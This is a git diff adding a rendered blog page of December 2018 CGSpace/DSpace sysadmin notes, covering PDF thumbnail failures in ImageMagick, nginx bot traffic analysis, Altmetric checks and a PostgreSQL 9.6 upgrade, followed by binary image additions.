+<pre tabindex="0"><code>$ identify Food\ safety\ Kenya\ fruits.pdf\[0\]
+zsh: abort (core dumped)  identify Food\ safety\ Kenya\ fruits.pdf\[0\]
+</code></pre><ul>
+<li>But with GraphicsMagick&rsquo;s <code>identify</code> it works:</li>
+</ul>
+<pre tabindex="0"><code>$ gm identify Food\ safety\ Kenya\ fruits.pdf\[0\]
+DEBUG: FC_WEIGHT didn&#39;t match
+Food safety Kenya fruits.pdf PDF 612x792+0+0 DirectClass 8-bit 1.4Mi 0.000u 0m:0.000002s
+</code></pre><ul>
+<li>Interesting that ImageMagick&rsquo;s <code>identify</code> <em>does</em> work if you do not specify a page, perhaps as <a href="https://bugs.ghostscript.com/show_bug.cgi?id=699815">alluded to in the recent Ghostscript bug report</a>:</li>
+</ul>
+<pre tabindex="0"><code>$ identify Food\ safety\ Kenya\ fruits.pdf
+Food safety Kenya fruits.pdf[0] PDF 612x792 612x792+0+0 16-bit sRGB 64626B 0.010u 0:00.009
+Food safety Kenya fruits.pdf[1] PDF 612x792 612x792+0+0 16-bit sRGB 64626B 0.010u 0:00.009
+Food safety Kenya fruits.pdf[2] PDF 612x792 612x792+0+0 16-bit sRGB 64626B 0.010u 0:00.009
+Food safety Kenya fruits.pdf[3] PDF 612x792 612x792+0+0 16-bit sRGB 64626B 0.010u 0:00.009
+Food safety Kenya fruits.pdf[4] PDF 612x792 612x792+0+0 16-bit sRGB 64626B 0.010u 0:00.009
+identify: CorruptImageProfile `xmp&#39; @ warning/profile.c/SetImageProfileInternal/1746.
+</code></pre><ul>
+<li>As I expected, ImageMagick cannot generate a thumbnail, but GraphicsMagick can (though it looks like crap):</li>
+</ul>
+<pre tabindex="0"><code>$ convert Food\ safety\ Kenya\ fruits.pdf\[0\] -thumbnail 600x600 -flatten Food\ safety\ Kenya\ fruits.pdf.jpg
+zsh: abort (core dumped)  convert Food\ safety\ Kenya\ fruits.pdf\[0\] -thumbnail 600x600 -flatten
+$ gm convert Food\ safety\ Kenya\ fruits.pdf\[0\] -thumbnail 600x600 -flatten Food\ safety\ Kenya\ fruits.pdf.jpg
+DEBUG: FC_WEIGHT didn&#39;t match
+</code></pre><ul>
+<li>I inspected the troublesome PDF using <a href="http://jhove.openpreservation.org/">jhove</a> and noticed that it is using <code>ISO PDF/A-1, Level B</code> and the other one doesn&rsquo;t list a profile, though I don&rsquo;t think this is relevant</li>
+<li>I found another item that fails when generating a thumbnail (<a href="https://hdl.handle.net/10568/98391">10568/98391</a>, DSpace complains:</li>
+</ul>
+<pre tabindex="0"><code>org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&#34;gs&#34; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &#34;-sDEVICE=pngalpha&#34; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &#34;-r72x72&#34; -dFirstPage=1 -dLastPage=1 &#34;-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d&#34; &#34;-f/tmp/magick-14296Q0rJjfCeIj3w&#34; &#34;-f/tmp/magick-14296k_K6MWqwvpDm&#34;&#39; (-1) @ error/delegate.c/ExternalDelegateCommand/461.
+org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&#34;gs&#34; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &#34;-sDEVICE=pngalpha&#34; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &#34;-r72x72&#34; -dFirstPage=1 -dLastPage=1 &#34;-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d&#34; &#34;-f/tmp/magick-14296Q0rJjfCeIj3w&#34; &#34;-f/tmp/magick-14296k_K6MWqwvpDm&#34;&#39; (-1) @ error/delegate.c/ExternalDelegateCommand/461.
+        at org.im4java.core.Info.getBaseInfo(Info.java:360)
+        at org.im4java.core.Info.&lt;init&gt;(Info.java:151)
+        at org.dspace.app.mediafilter.ImageMagickThumbnailFilter.getImageFile(ImageMagickThumbnailFilter.java:142)
+        at org.dspace.app.mediafilter.ImageMagickPdfThumbnailFilter.getDestinationStream(ImageMagickPdfThumbnailFilter.java:24)
+        at org.dspace.app.mediafilter.FormatFilter.processBitstream(FormatFilter.java:170)
+        at org.dspace.app.mediafilter.MediaFilterManager.filterBitstream(MediaFilterManager.java:475)
+        at org.dspace.app.mediafilter.MediaFilterManager.filterItem(MediaFilterManager.java:429)
+        at org.dspace.app.mediafilter.MediaFilterManager.applyFiltersItem(MediaFilterManager.java:401)
+        at org.dspace.app.mediafilter.MediaFilterManager.main(MediaFilterManager.java:237)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:226)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:78)
+Caused by: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&#34;gs&#34; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &#34;-sDEVICE=pngalpha&#34; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &#34;-r72x72&#34; -dFirstPage=1 -dLastPage=1 &#34;-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d&#34; &#34;-f/tmp/magick-14296Q0rJjfCeIj3w&#34; &#34;-f/tmp/magick-14296k_K6MWqwvpDm&#34;&#39; (-1) @ error/delegate.c/ExternalDelegateCommand/461.
+        at org.im4java.core.ImageCommand.run(ImageCommand.java:219)
+        at org.im4java.core.Info.getBaseInfo(Info.java:342)
+        ... 14 more
+Caused by: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&#34;gs&#34; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &#34;-sDEVICE=pngalpha&#34; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &#34;-r72x72&#34; -dFirstPage=1 -dLastPage=1 &#34;-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d&#34; &#34;-f/tmp/magick-14296Q0rJjfCeIj3w&#34; &#34;-f/tmp/magick-14296k_K6MWqwvpDm&#34;&#39; (-1) @ error/delegate.c/ExternalDelegateCommand/461.
+        at org.im4java.core.ImageCommand.finished(ImageCommand.java:253)
+        at org.im4java.process.ProcessStarter.run(ProcessStarter.java:314)
+        at org.im4java.core.ImageCommand.run(ImageCommand.java:215)
+        ... 15 more
+</code></pre><ul>
+<li>And on my Arch Linux environment ImageMagick&rsquo;s <code>convert</code> also segfaults:</li>
+</ul>
+<pre tabindex="0"><code>$ convert bnfb_biofortification\ Module_Participants\ Guide\ 2018.pdf\[0\] -thumbnail x600 -flatten bnfb_biofortification\ Module_Participants\ Guide\ 2018.pdf.jpg
+zsh: abort (core dumped)  convert bnfb_biofortification\ Module_Participants\ Guide\ 2018.pdf\[0\]  x60
+</code></pre><ul>
+<li>But GraphicsMagick&rsquo;s <code>convert</code> works:</li>
+</ul>
+<pre tabindex="0"><code>$ gm convert bnfb_biofortification\ Module_Participants\ Guide\ 2018.pdf\[0\] -thumbnail x600 -flatten bnfb_biofortification\ Module_Participants\ Guide\ 2018.pdf.jpg
+</code></pre><ul>
+<li>So far the only thing that stands out is that the two files that don&rsquo;t work were created with Microsoft Office 2016:</li>
+</ul>
+<pre tabindex="0"><code>$ pdfinfo bnfb_biofortification\ Module_Participants\ Guide\ 2018.pdf | grep -E &#39;^(Creator|Producer)&#39;
+Creator:        Microsoft® Word 2016
+Producer:       Microsoft® Word 2016
+$ pdfinfo Food\ safety\ Kenya\ fruits.pdf | grep -E &#39;^(Creator|Producer)&#39;
+Creator:        Microsoft® Word 2016
+Producer:       Microsoft® Word 2016
+</code></pre><ul>
+<li>And the one that works was created with Office 365:</li>
+</ul>
+<pre tabindex="0"><code>$ pdfinfo Info\ Note\ Mainstreaming\ gender\ and\ social\ differentiation\ into\ CCAFS\ research\ activities\ in\ West\ Africa-converted.pdf | grep -E &#39;^(Creator|Producer)&#39;
+Creator:        Microsoft® Word for Office 365
+Producer:       Microsoft® Word for Office 365
+</code></pre><ul>
+<li>I remembered an old technique I was using to generate thumbnails in 2015 using Inkscape followed by ImageMagick or GraphicsMagick:</li>
+</ul>
+<pre tabindex="0"><code>$ inkscape Food\ safety\ Kenya\ fruits.pdf -z --export-dpi=72 --export-area-drawing --export-png=&#39;cover.png&#39;
+$ gm convert -resize x600 -flatten -quality 85 cover.png cover.jpg
+</code></pre><ul>
+<li>I&rsquo;ve tried a few times this week to register for the <a href="https://www.evisa.gov.et/">Ethiopian eVisa website</a>, but it is never successful</li>
+<li>In the end I tried one last time to just apply without registering and it was apparently successful</li>
+<li>Testing DSpace 5.8 (<code>5_x-prod</code> branch) in an Ubuntu 18.04 VM with Tomcat 8.5 and had some issues:
+<ul>
+<li>JSPUI shows an internal error (log shows something about tag cloud, though, so might be unrelated)</li>
+<li>Atmire Listings and Reports, which use JSPUI, asks you to log in again and then doesn&rsquo;t work</li>
+<li>Content and Usage Analysis doesn&rsquo;t show up in the sidebar after logging in</li>
+<li>I can navigate to <a href="https://dspacetest.cgiar.org/atmire/reporting-suite/usage-graph-editor">/atmire/reporting-suite/usage-graph-editor</a>, but it&rsquo;s only the Atmire theme and a &ldquo;page not found&rdquo; message</li>
+<li>Related messages from dspace.log:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>2018-12-03 15:44:00,030 WARN  org.dspace.core.ConfigurationManager @ Requested configuration module: atmire-datatables not found
+2018-12-03 15:44:03,390 ERROR com.atmire.app.webui.servlet.ExportServlet @ Error converter plugin not found: interface org.infoCon.ConverterPlugin
+...
+2018-12-03 15:45:01,667 WARN  org.dspace.core.ConfigurationManager @ Requested configuration module: atmire-listing-and-reports not found
+</code></pre><ul>
+<li>I tested it on my local environment with Tomcat 8.5.34 and the JSPUI application still has an error (again, the logs show something about tag cloud, so be unrelated), and the Listings and Reports still asks you to log in again, despite already being logged in in XMLUI, but does appear to work (I generated a report and exported a PDF)</li>
+<li>I think the errors about missing Atmire components must be important, here on my local machine as well (though not the one about atmire-listings-and-reports):</li>
+</ul>
+<pre tabindex="0"><code>2018-12-03 16:44:00,009 WARN  org.dspace.core.ConfigurationManager @ Requested configuration module: atmire-datatables not found
+</code></pre><ul>
+<li>This has got to be part Ubuntu Tomcat packaging, and part DSpace 5.x Tomcat 8.5 readiness&hellip;?</li>
+</ul>
+<h2 id="2018-12-04">2018-12-04</h2>
+<ul>
+<li>Last night Linode sent a message that the load on CGSpace (linode18) was too high, here&rsquo;s a list of the top users at the time and throughout the day:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;03/Dec/2018:1(5|6|7|8)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    225 40.77.167.142
+    226 66.249.64.63
+    232 46.101.86.248
+    285 45.5.186.2
+    333 54.70.40.11
+    411 193.29.13.85
+    476 34.218.226.147
+    962 66.249.70.27
+   1193 35.237.175.180
+   1450 2a01:4f8:140:3192::2
+# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;03/Dec/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+   1141 207.46.13.57
+   1299 197.210.168.174
+   1341 54.70.40.11
+   1429 40.77.167.142
+   1528 34.218.226.147
+   1973 66.249.70.27
+   2079 50.116.102.77
+   2494 78.46.79.71
+   3210 2a01:4f8:140:3192::2
+   4190 35.237.175.180
+</code></pre><ul>
+<li><code>35.237.175.180</code> is known to us (CCAFS?), and I&rsquo;ve already added it to the list of bot IPs in nginx, which appears to be working:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=35.237.175.180&#39; dspace.log.2018-12-03
+4772
+$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=35.237.175.180&#39; dspace.log.2018-12-03 | sort | uniq | wc -l
+630
+</code></pre><ul>
+<li>I haven&rsquo;t seen <code>2a01:4f8:140:3192::2</code> before. Its user agent is some new bot:</li>
+</ul>
+<pre tabindex="0"><code>Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)
+</code></pre><ul>
+<li>At least it seems the Tomcat Crawler Session Manager Valve is working to re-use the common bot XMLUI sessions:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=2a01:4f8:140:3192::2&#39; dspace.log.2018-12-03
+5111
+$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=2a01:4f8:140:3192::2&#39; dspace.log.2018-12-03 | sort | uniq | wc -l
+419
+</code></pre><ul>
+<li><code>78.46.79.71</code> is another host on Hetzner with the following user agent:</li>
+</ul>
+<pre tabindex="0"><code>Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:62.0) Gecko/20100101 Firefox/62.0
+</code></pre><ul>
+<li>This is not the first time a host on Hetzner has used a &ldquo;normal&rdquo; user agent to make thousands of requests</li>
+<li>At least it is re-using its Tomcat sessions somehow:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=78.46.79.71&#39; dspace.log.2018-12-03
+2044
+$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=78.46.79.71&#39; dspace.log.2018-12-03 | sort | uniq | wc -l
+1
+</code></pre><ul>
+<li>In other news, it&rsquo;s good to see my re-work of the database connectivity in the <a href="https://github.com/ilri/dspace-statistics-api">dspace-statistics-api</a> actually caused a reduction of persistent database connections (from 1 to 0, but still!):</li>
+</ul>
+<p><img src="/cgspace-notes/2018/12/postgres_connections_db-month.png" alt="PostgreSQL connections day"></p>
+<h2 id="2018-12-05">2018-12-05</h2>
+<ul>
+<li>Discuss RSS issues with IWMI and WLE people</li>
+</ul>
+<h2 id="2018-12-06">2018-12-06</h2>
+<ul>
+<li>Linode sent a message that the CPU usage of CGSpace (linode18) is too high last night</li>
+<li>I looked in the logs and there&rsquo;s nothing particular going on:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;05/Dec/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+   1225 157.55.39.177
+   1240 207.46.13.12
+   1261 207.46.13.101
+   1411 207.46.13.157
+   1529 34.218.226.147
+   2085 50.116.102.77
+   3334 2a01:7e00::f03c:91ff:fe0a:d645
+   3733 66.249.70.27
+   3815 35.237.175.180
+   7669 54.70.40.11
+</code></pre><ul>
+<li><code>54.70.40.11</code> is some new bot with the following user agent:</li>
+</ul>
+<pre tabindex="0"><code>Mozilla/5.0 (compatible) SemanticScholarBot (+https://www.semanticscholar.org/crawler)
+</code></pre><ul>
+<li>But Tomcat is forcing them to re-use their Tomcat sessions with the Crawler Session Manager valve:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=54.70.40.11&#39; dspace.log.2018-12-05
+6980
+$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=54.70.40.11&#39; dspace.log.2018-12-05 | sort | uniq | wc -l
+1156
+</code></pre><ul>
+<li><code>2a01:7e00::f03c:91ff:fe0a:d645</code> appears to be the CKM dev server where Danny is testing harvesting via Drupal</li>
+<li>It seems they are hitting the XMLUI&rsquo;s OpenSearch a bit, but mostly on the REST API so no issues here yet</li>
+<li><code>Drupal</code> is already in the Tomcat Crawler Session Manager Valve&rsquo;s regex so that&rsquo;s good!</li>
+</ul>
+<h2 id="2018-12-10">2018-12-10</h2>
+<ul>
+<li>I ran into Mia Signs in Addis and we discussed Altmetric as well as RSS feeds again
+<ul>
+<li>We came up with an <a href="https://cgspace.cgiar.org/open-search/discover?query=crpsubject:Water,+Land+and+Ecosystems&amp;sort_by=3&amp;order=DESC">OpenSearch query for all items tagged with the WLE CRP subject</a> (where the <code>sort_by=3</code> parameter is the accession date, as configured in <code>dspace.cfg</code>)</li>
+<li>About Altmetric she was wondering why some low-ranking items of theirs do not have the Handle/DOI relationship, but high-ranking ones do</li>
+<li>It sounds kinda crazy, but she said when she talked to Altmetric about their Twitter harvesting they said their coverage is not perfect, so it might be some kinda prioritization thing where they only do it for popular items?</li>
+<li>I am testing this by <a href="https://twitter.com/mralanorth/status/1072153586342211584">tweeting</a> one <a href="https://cgspace.cgiar.org/handle/10568/98380">WLE item from CGSpace</a> that currently has no Altmetric score</li>
+<li>Interestingly, after about an hour I see it has already been <a href="https://cgspace.altmetric.com/details/50160871/twitter">picked up by Altmetric</a> and has my tweet as well as some other tweet from over a month ago&hellip;</li>
+<li>I <a href="https://twitter.com/mralanorth/status/1072198292182892545">tweeted a link to the item&rsquo;s DOI</a> to see if Altmetric will notice it, hopefully associated with the Handle I tweeted earlier</li>
+</ul>
+</li>
+</ul>
+<h2 id="2018-12-11">2018-12-11</h2>
+<ul>
+<li>I checked the <a href="https://twitter.com/mralanorth/status/1072198292182892545">latest tweet of the IWMI item with a DOI</a> and it was <a href="https://cgspace.altmetric.com/details/50160871/twitter">picked up by Altmetric</a>
+<ul>
+<li>There is one <a href="twitter.com/ArboNews/statuses/1055036747787223042">curious other tweet</a> from another user where they used the NCBI link, and that is also associated with our Handle on Altmetric</li>
+<li>So that means Altmetric is picking up the DOI from the NCBI metadata and making the association properly</li>
+</ul>
+</li>
+</ul>
+<h2 id="2018-12-13">2018-12-13</h2>
+<ul>
+<li>Oh this is very interesting: <a href="https://digitalarchive.worldfishcenter.org">WorldFish&rsquo;s repository is live now</a></li>
+<li>It&rsquo;s running DSpace 5.9-SNAPSHOT running on KnowledgeArc and the OAI and REST interfaces are active at least</li>
+<li>Also, I notice they ended up registering a Handle (they had been considering taking KnowledgeArc&rsquo;s advice to <em>not</em> use Handles!)</li>
+<li>Did some coordination work on the hotel bookings for the January AReS workshop in Amman</li>
+</ul>
+<h2 id="2018-12-17">2018-12-17</h2>
+<ul>
+<li>Linode alerted me twice today that the load on CGSpace (linode18) was very high</li>
+<li>Looking at the nginx logs I see a few new IPs in the top 10:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;17/Dec/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    927 157.55.39.81
+    975 54.70.40.11
+   2090 50.116.102.77
+   2121 66.249.66.219
+   3811 35.237.175.180
+   4590 205.186.128.185
+   4590 70.32.83.92
+   5436 2a01:4f8:173:1e85::2
+   5438 143.233.227.216
+   6706 94.71.244.172
+</code></pre><ul>
+<li><code>94.71.244.172</code> and <code>143.233.227.216</code> are both in Greece and use the following user agent:</li>
+</ul>
+<pre tabindex="0"><code>Mozilla/3.0 (compatible; Indy Library)
+</code></pre><ul>
+<li>I see that I added this bot to the Tomcat Crawler Session Manager valve in 2017-12 so its XMLUI sessions are getting re-used</li>
+<li><code>2a01:4f8:173:1e85::2</code> is some new bot called <code>BLEXBot/1.0</code> which should be matching the existing &ldquo;bot&rdquo; pattern in the Tomcat Crawler Session Manager regex</li>
+</ul>
+<h2 id="2018-12-18">2018-12-18</h2>
+<ul>
+<li>Open a <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=657">ticket</a> with Atmire to ask them to prepare the Metadata Quality Module for our DSpace 5.8 code</li>
+</ul>
+<h2 id="2018-12-19">2018-12-19</h2>
+<ul>
+<li>Update Atmire Listings and Reports to add the journal title (<code>dc.source</code>) to bibliography and update example bibliography values (<a href="https://github.com/ilri/DSpace/pull/405">#405</a>)</li>
+</ul>
+<h2 id="2018-12-20">2018-12-20</h2>
+<ul>
+<li>Testing compression of PostgreSQL backups with xz and gzip:</li>
+</ul>
+<pre tabindex="0"><code>$ time xz -c cgspace_2018-12-19.backup &gt; cgspace_2018-12-19.backup.xz
+xz -c cgspace_2018-12-19.backup &gt; cgspace_2018-12-19.backup.xz  48.29s user 0.19s system 99% cpu 48.579 total
+$ time gzip -c cgspace_2018-12-19.backup &gt; cgspace_2018-12-19.backup.gz
+gzip -c cgspace_2018-12-19.backup &gt; cgspace_2018-12-19.backup.gz  2.78s user 0.09s system 99% cpu 2.899 total
+$ ls -lh cgspace_2018-12-19.backup*
+-rw-r--r-- 1 aorth aorth 96M Dec 19 02:15 cgspace_2018-12-19.backup
+-rw-r--r-- 1 aorth aorth 94M Dec 20 11:36 cgspace_2018-12-19.backup.gz
+-rw-r--r-- 1 aorth aorth 93M Dec 20 11:35 cgspace_2018-12-19.backup.xz
+</code></pre><ul>
+<li>Looks like it&rsquo;s really not worth it&hellip;</li>
+<li>Peter pointed out that Discovery filters for CTA subjects on item pages were not working</li>
+<li>It looks like there were some mismatches in the Discovery index names and the XMLUI configuration, so I fixed them (<a href="https://github.com/ilri/DSpace/pull/406">#406</a>)</li>
+<li>Peter asked if we could create a controlled vocabulary for publishers (<code>dc.publisher</code>)</li>
+<li>I see we have about 3500 distinct publishers:</li>
+</ul>
+<pre tabindex="0"><code># SELECT COUNT(DISTINCT(text_value)) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=39;
+ count
+-------
+  3522
+(1 row)
+</code></pre><ul>
+<li>I reverted the metadata changes related to &ldquo;Unrestricted Access&rdquo; and &ldquo;Restricted Access&rdquo; on DSpace Test because we&rsquo;re not pushing forward with the new status terms for now</li>
+<li>Purge remaining Oracle Java 8 stuff from CGSpace (linode18) since we migrated to OpenJDK a few months ago:</li>
+</ul>
+<pre tabindex="0"><code># dpkg -P oracle-java8-installer oracle-java8-set-default
+</code></pre><ul>
+<li>Update usage rights on CGSpace as we agreed with Maria Garruccio and Peter last month:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-11-27-update-rights.csv -f dc.rights -t correct -m 53 -db dspace -u dspace -p &#39;fuu&#39; -d
+Connected to database.
+Fixed 466 occurences of: Copyrighted; Any re-use allowed
+</code></pre><ul>
+<li>Upgrade PostgreSQL on CGSpace (linode18) from 9.5 to 9.6:</li>
+</ul>
+<pre tabindex="0"><code># apt install postgresql-9.6 postgresql-client-9.6 postgresql-contrib-9.6 postgresql-server-dev-9.6
+# pg_ctlcluster 9.5 main stop
+# tar -cvzpf var-lib-postgresql-9.5.tar.gz /var/lib/postgresql/9.5
+# tar -cvzpf etc-postgresql-9.5.tar.gz /etc/postgresql/9.5
+# pg_ctlcluster 9.6 main stop
+# pg_dropcluster 9.6 main
+# pg_upgradecluster 9.5 main
+# pg_dropcluster 9.5 main
+# dpkg -l | grep postgresql | grep 9.5 | awk &#39;{print $2}&#39; | xargs dpkg -r
+</code></pre><ul>
+<li>I&rsquo;ve been running PostgreSQL 9.6 for months on my local development and public DSpace Test (linode19) environments</li>
+<li>Run all system updates on CGSpace (linode18) and restart the server</li>
+<li>Try to run the DSpace cleanup script on CGSpace (linode18), but I get some errors about foreign key constraints:</li>
+</ul>
+<pre tabindex="0"><code>$ dspace cleanup -v
+ - Deleting bitstream information (ID: 158227)
+ - Deleting bitstream record from database (ID: 158227)
+Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
+  Detail: Key (bitstream_id)=(158227) is still referenced from table &#34;bundle&#34;.
+...
+</code></pre><ul>
+<li>As always, the solution is to delete those IDs manually in PostgreSQL:</li>
+</ul>
+<pre tabindex="0"><code>$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (158227, 158251);&#39;
+UPDATE 1
+</code></pre><ul>
+<li>After all that I started a full Discovery reindex to get the index name changes and rights updates</li>
+</ul>
+<h2 id="2018-12-29">2018-12-29</h2>
+<ul>
+<li>CGSpace went down today for a few minutes while I was at dinner and I quickly restarted Tomcat</li>
+<li>The top IP addresses as of this evening are:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;29/Dec/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    963 40.77.167.152
+    987 35.237.175.180
+   1062 40.77.167.55
+   1464 66.249.66.223
+   1660 34.218.226.147
+   1801 70.32.83.92
+   2005 50.116.102.77
+   3218 66.249.66.219
+   4608 205.186.128.185
+   5585 54.70.40.11
+</code></pre><ul>
+<li>And just around the time of the alert:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log.1 /var/log/nginx/*.log.2.gz | grep -E &#34;29/Dec/2018:1(6|7|8)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    115 66.249.66.223
+    118 207.46.13.14
+    123 34.218.226.147
+    133 95.108.181.88
+    137 35.237.175.180
+    164 66.249.66.219
+    260 157.55.39.59
+    291 40.77.167.55
+    312 207.46.13.129
+   1253 54.70.40.11
+</code></pre><ul>
+<li>All these look ok (<code>54.70.40.11</code> is known to us from earlier this month and should be reusing its Tomcat sessions)</li>
+<li>So I&rsquo;m not sure what was going on last night&hellip;</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2018/01/cpu-week.png b/docs/2018/01/cpu-week.png
new file mode 100644
index 000000000..2f5870268
Binary files /dev/null and b/docs/2018/01/cpu-week.png differ
diff --git a/docs/2018/01/dc-rights-submission.png b/docs/2018/01/dc-rights-submission.png
new file mode 100644
index 000000000..f811addd1
Binary files /dev/null and b/docs/2018/01/dc-rights-submission.png differ
diff --git a/docs/2018/01/firewall-perfectip.png b/docs/2018/01/firewall-perfectip.png
new file mode 100644
index 000000000..876d8612b
Binary files /dev/null and b/docs/2018/01/firewall-perfectip.png differ
diff --git a/docs/2018/01/jvisualvm-mbeans-path.png b/docs/2018/01/jvisualvm-mbeans-path.png
new file mode 100644
index 000000000..9159b34b5
Binary files /dev/null and b/docs/2018/01/jvisualvm-mbeans-path.png differ
diff --git a/docs/2018/01/openrefine-authors.png b/docs/2018/01/openrefine-authors.png
new file mode 100644
index 000000000..bc94a8487
Binary files /dev/null and b/docs/2018/01/openrefine-authors.png differ
diff --git a/docs/2018/01/postgres_connections-day-perfectip.png b/docs/2018/01/postgres_connections-day-perfectip.png
new file mode 100644
index 000000000..95e35e298
Binary files /dev/null and b/docs/2018/01/postgres_connections-day-perfectip.png differ
diff --git a/docs/2018/01/postgres_connections-day.png b/docs/2018/01/postgres_connections-day.png
new file mode 100644
index 000000000..da27ce7af
Binary files /dev/null and b/docs/2018/01/postgres_connections-day.png differ
diff --git a/docs/2018/01/tomcat-jvm-day.png b/docs/2018/01/tomcat-jvm-day.png
new file mode 100644
index 000000000..17f956fd5
Binary files /dev/null and b/docs/2018/01/tomcat-jvm-day.png differ
diff --git a/docs/2018/01/tomcat-threads-day.png b/docs/2018/01/tomcat-threads-day.png
new file mode 100644
index 000000000..c22fa890f
Binary files /dev/null and b/docs/2018/01/tomcat-threads-day.png differ
diff --git a/docs/2018/02/CCAFS_WP_223.jpg b/docs/2018/02/CCAFS_WP_223.jpg
new file mode 100644
index 000000000..ed48758f8
Binary files /dev/null and b/docs/2018/02/CCAFS_WP_223.jpg differ
diff --git a/docs/2018/02/CCAFS_WP_223.pdf.jpg b/docs/2018/02/CCAFS_WP_223.pdf.jpg
new file mode 100644
index 000000000..f49be90aa
Binary files /dev/null and b/docs/2018/02/CCAFS_WP_223.pdf.jpg differ
diff --git a/docs/2018/02/atmire-workflow-statistics.png b/docs/2018/02/atmire-workflow-statistics.png
new file mode 100644
index 000000000..d593de879
Binary files /dev/null and b/docs/2018/02/atmire-workflow-statistics.png differ
